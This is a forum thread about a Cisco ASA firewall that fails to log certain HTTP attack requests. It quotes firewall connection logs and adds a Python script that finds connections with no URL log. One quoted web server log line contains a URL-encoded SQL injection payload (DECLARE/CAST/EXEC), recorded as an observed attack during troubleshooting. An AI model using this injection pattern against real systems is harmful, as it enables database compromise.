
ASA not logging certain requests?

I have a bunch of attack requests not being logged by my ASA-5550, version 7.2(4).

On my web-server I see an attack:

B.A.D.IP; HTTP/1.0 - [23/Jul/2008:11:37:30 -0700] GET /downloads/file/fid?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(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%20AS%20CHAR(4000));EXEC(@S); HTTP/1.0 500 4635; null; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

The only thing I see in the ASA logs is:

Jul 23 11:37:29 192.168.22.254 %ASA-7-609001: Built local-host outside:B.A.D.IP

Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718934 for outside:B.A.D.IP/2668 (B.A.D.IP/2668) to inside:192.168.10.100/80 (G.OO.D.IP/80)

Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 1803718936 for outside:B.A.D.IP/2669 (B.A.D.IP/2669) to inside:192.168.10.100/80 (G.OO.D.IP/80)

Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718936 for outside:B.A.D.IP/2669 to inside:192.168.10.100/80 duration 0:00:01 bytes 4123 TCP FINs

Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 1803718934 for outside:B.A.D.IP/2668 to inside:192.168.10.100/80 duration 0:00:01 bytes 4122 TCP FINs

Jul 23 11:37:30 192.168.22.254 %ASA-7-609002: Teardown local-host outside:B.A.D.IP duration 0:00:01

Usually I'll get the ASA logs (%ASA-5-304001) that I can grep for and see all of the 'Accessed URL' lines. For some reason none of these attacks are being logged. I'm concerned that not only are they getting through, they are doing so silently.


Re: ASA not logging certain requests?

Thank you for the response.

I am well aware of the logging types; the problem is that I'm not receiving the logging message 304001 for the given URI. I receive them for all other URIs, just not this specific attack.

My thought is that the ASA signature swallows it, does not send it to syslog, and then passes it on to the web server. I'm okay with it passing it along but it seems a little odd that it does not get logged.

I was getting many of these requests and see them on all of my webservers but not one shows up in my syslog while all the other 304001 do show up.
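An added example, not part of the original posts: one way to surface the gap described in this thread is to correlate 302013/302014 connection records to port 80 with 304001 'Accessed URL' lines and list connections that moved data but produced no URL log. The sample lines use constructed documentation addresses, and the 304001 layout in the regex is an assumption to check against your own syslog.

```python
import re

# Constructed sample syslog lines (documentation addresses, not taken from the post).
SAMPLE = """\
Jul 23 11:37:29 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 101 for outside:203.0.113.7/2668 (203.0.113.7/2668) to inside:192.168.10.100/80 (198.51.100.10/80)
Jul 23 11:37:30 192.168.22.254 %ASA-6-302014: Teardown TCP connection 101 for outside:203.0.113.7/2668 to inside:192.168.10.100/80 duration 0:00:01 bytes 4122 TCP FINs
Jul 23 11:38:02 192.168.22.254 %ASA-6-302013: Built inbound TCP connection 102 for outside:203.0.113.9/4100 (203.0.113.9/4100) to inside:192.168.10.100/80 (198.51.100.10/80)
Jul 23 11:38:02 192.168.22.254 %ASA-5-304001: 203.0.113.9 Accessed URL 192.168.10.100:/index.html
Jul 23 11:38:03 192.168.22.254 %ASA-6-302014: Teardown TCP connection 102 for outside:203.0.113.9/4100 to inside:192.168.10.100/80 duration 0:00:01 bytes 900 TCP FINs
"""

BUILT = re.compile(r"%ASA-6-302013: Built inbound TCP connection (\d+) for "
                   r"\S+?:([\d.]+)/\d+ \(\S+\) to \S+?:([\d.]+)/(\d+)")
TEARDOWN = re.compile(r"%ASA-6-302014: Teardown TCP connection (\d+) .* bytes (\d+)")
# Assumed 304001 layout: "[user@]<source> Accessed URL <dest>:<url>"
URL = re.compile(r"%ASA-5-304001: (?:\S+@)?([\d.]+) Accessed URL ")


def unlogged_http(lines, http_ports=("80",)):
    """Return HTTP connections that carried bytes but whose source
    address never appears in a 304001 'Accessed URL' message."""
    conns = {}            # connection id -> details from 302013/302014
    url_sources = set()   # source addresses seen in 304001 lines
    for line in lines:
        if m := BUILT.search(line):
            cid, src, dst, port = m.groups()
            if port in http_ports:
                conns[cid] = {"conn_id": cid, "src": src, "dst": dst, "bytes": 0}
        elif m := TEARDOWN.search(line):
            if m.group(1) in conns:
                conns[m.group(1)]["bytes"] = int(m.group(2))
        elif m := URL.search(line):
            url_sources.add(m.group(1))
    return [c for c in conns.values()
            if c["bytes"] > 0 and c["src"] not in url_sources]


if __name__ == "__main__":
    for hit in unlogged_http(SAMPLE.splitlines()):
        print("no 304001 for connection", hit)
```

Matching is per source address, so a client with one logged and one unlogged request is not flagged; comparing the result against the web server's access log closes that gap.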
